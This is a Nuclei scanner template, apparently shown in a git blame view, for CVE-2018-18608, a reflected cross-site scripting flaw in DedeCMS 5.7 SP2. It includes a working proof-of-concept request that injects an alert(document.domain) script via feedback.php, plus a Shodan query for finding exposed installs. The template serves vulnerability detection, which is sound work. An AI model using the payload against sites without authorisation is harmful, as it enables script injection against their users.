nuclei-templates/cves/2018/CVE-2018-18608.yaml

45 lines
1.4 KiB
YAML
Raw Normal View History

2022-05-19 13:19:24 +00:00
id: CVE-2018-18608
info:
2022-05-19 18:56:42 +00:00
name: DedeCMS V5.7 - Cross Site Scripting
2022-05-19 13:19:24 +00:00
author: ritikchaddha
severity: medium
2022-05-19 18:51:59 +00:00
description: |
DedeCMS 5.7 SP2 allows XSS via the function named GetPageList defined in the include/datalistcp.class.php file that is used to display the page numbers list at the bottom of some templates, as demonstrated by the PATH_INFO to /member/index.php, /member/pm.php, /member/content_list.php, or /plus/feedback.php.
reference:
2022-05-19 13:19:24 +00:00
- https://github.com/ky-j/dedecms/issues/8
2022-05-19 18:51:59 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2018-18608
- https://github.com/ky-j/dedecms/files/2504649/Reflected.XSS.Vulnerability.exists.in.the.file.of.DedeCMS.V5.7.SP2.docx
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2018-18608
cwe-id: CWE-79
2022-05-19 18:51:59 +00:00
metadata:
2022-05-19 19:02:06 +00:00
shodan-query: http.html:"DedeCms"
verified: "true"
2022-05-19 13:19:24 +00:00
tags: dedecms,xss,cve,cve2018
requests:
- method: GET
path:
2022-05-19 18:51:59 +00:00
- "{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"
2022-05-19 13:19:24 +00:00
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-05-19 18:51:59 +00:00
- "'><script>alert(document.domain)</script>"
- "DedeCMS Error Warning!"
condition: and
2022-05-19 13:19:24 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
- 200